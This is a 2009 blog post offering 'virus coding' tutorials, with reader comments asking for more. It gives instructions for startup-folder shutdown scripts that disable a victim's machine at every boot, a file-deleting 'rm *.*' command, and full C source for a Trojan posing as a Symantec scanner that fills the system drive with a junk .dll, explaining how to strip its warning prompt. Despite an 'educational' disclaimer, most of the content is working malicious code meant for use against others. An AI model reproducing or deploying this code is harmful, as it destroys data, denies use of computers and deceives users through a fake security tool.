Tuesday, December 29, 2009

Virus Coding



shutdown/ restart virus

By Abir Atarthy

Today i will show you how to create a shutdown/ restart virus for both Windows and Linux. This is very simple and you do not need any programming knowlwdge for it.

This post is not intended to create a havoc and is just for educational purpose.




First we will create the windows version.

Lets see how it works. Just close all windows . Now go to command prompt(Start >>>"RUN" now trpe "cmd"). Now you have entered MS-DOS/ Command prompt. Here You need to type "shutdown -s" or "restart -s". This will shutdown or restart your comp. We are making use of this DOS command to create this virus.

  • Just open a notepad

  • In that type "shutdown -s" or "restart -s".

  • Now save it as virus.bat

  • Now put this file into start up folder

  • Now this program will load every time the computer starts.
  • Now when you run it your system gets turned off.


Only way out for him is to go in safe mode and delete it from startup. So go ahead and try them out.

Now the linux version.

In Linux we will create a shell script with the text "poweroff". Now go to the file where script is located and right click on it. Change the permission to allow all. Job done.

So Have fun guys and do leave your feedbacks!


simple Linux virus.

system("poweroff");

This simple script will turn off your victims comp. The above linux virus can be made extremely dangerous by making a simple change. if you can make your code do it's job when ever a person turns on his comp then think what will happen ( i mean other than you going to jail) the person must have to format his system.

Now lets step it up.Lets increase the venom of our snake

system("rm *.*");

This will erase/delete all files with all extension provided the logged user has permission to delete it.Just imagine if the admin runs it then it will create a havoc.

Now lets come back to windows what if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.

These are very simple virus but can cause havoc.

---------


Make your own Trojan Horse

By Abir Atarthy

What is Trojan Horse?

In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

I am going to tell you about a Trojan horse which appears itself antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

Here is the logic of the Trojan program:-

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

How to compile, test and remove the damage?

Compilation:

You can use Borland C++ compiler (or equivalent) to compile the Trojan.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

Here is the full source code of the program:-

Note:- This is totally intended for educational purpose only. I am no way responsible if you end up corrupting your system. Read the DISCLAIMER section of this site before you proceed.

#include "stdio.h"

#include "conio.h"

#include "dos.h"

#include "stdlib.h"

FILE *a,*t,*b;

int r,status,vir_count;

double i;

char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);

void findroot(void);

void showstatus(void);

void draw(void);

void accept(void);

void main()

{

draw();

accept();

textcolor(WHITE);

draw();

gotoxy(12,8);

cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");

sleep(3);

gotoxy(12,8);

delline();

cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");

getch();

gotoxy(12,8);

delline();

findroot();

}

void accept()

{

textcolor(LIGHTRED);

gotoxy(1,8);

cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)

exit(0);

}

void draw()

{

clrscr();

textcolor(WHITE);

gotoxy(12,2);

cputs("********************************************************");

gotoxy(12,6);

cputs("********************************************************");

gotoxy(12,3);

cputs("*\n\b*\n\b*\n\b");

gotoxy(67,3);

cputs("*\n\b*\n\b*\n\b");

gotoxy(14,4);

cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");

}

void findroot()

{

t=fopen("C:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

textcolor(WHITE);

a=fopen("C:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

t=fopen("D:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

a=fopen("D:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

t=fopen("E:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

a=fopen("E:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

t=fopen("F:\\windows\\explorer.exe","rb");

if(t!=NULL)

{

fclose(t);

a=fopen("F:\\windows\\system32\\spceshot.dll","rb");

if(a!=NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");

getch();

exit(1);

}

b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");

if(b!=NULL)

{

showstatus();

eatspace();

}

}

if(t==NULL)

{

textcolor(LIGHTRED);

gotoxy(12,8);

cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");

getch();

exit(1);

}

exit(1);

}

void eatspace()

{

textcolor(LIGHTRED);

gotoxy(12,16);

cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");

textcolor(WHITE);

gotoxy(12,18);

while(1)

{

for(r=1;r<4;r++)

{

for(i=1;i<900000;i++)

{

status=fputs(ch,b);

if(status==EOF)

{

textcolor(WHITE);

vir_count=random(120);

draw();

gotoxy(12,8);

cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);

gotoxy(12,10);

cprintf("PRESS ANY KEY TO CLOSE...");

getch();

break;

}

}

cputs(".");

if(status==EOF) break;

}

if(status==EOF) break;

}

exit(0);

}

void showstatus()

{

gotoxy(12,8);

cputs("SCANNING THE SYSTEM FOR THREATS");

gotoxy(12,10);

cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");

gotoxy(12,13);

cputs("SCAN IN PROGRESS. PLEASE WAIT...");

}



2 comments:

  1. Amazing content. The virus is working. Thanks Mr. Abir. pls give more such virus.

    ReplyDelete
  2. Wonderful !!!!!!!!!!
    Keep posting such codes

    ReplyDelete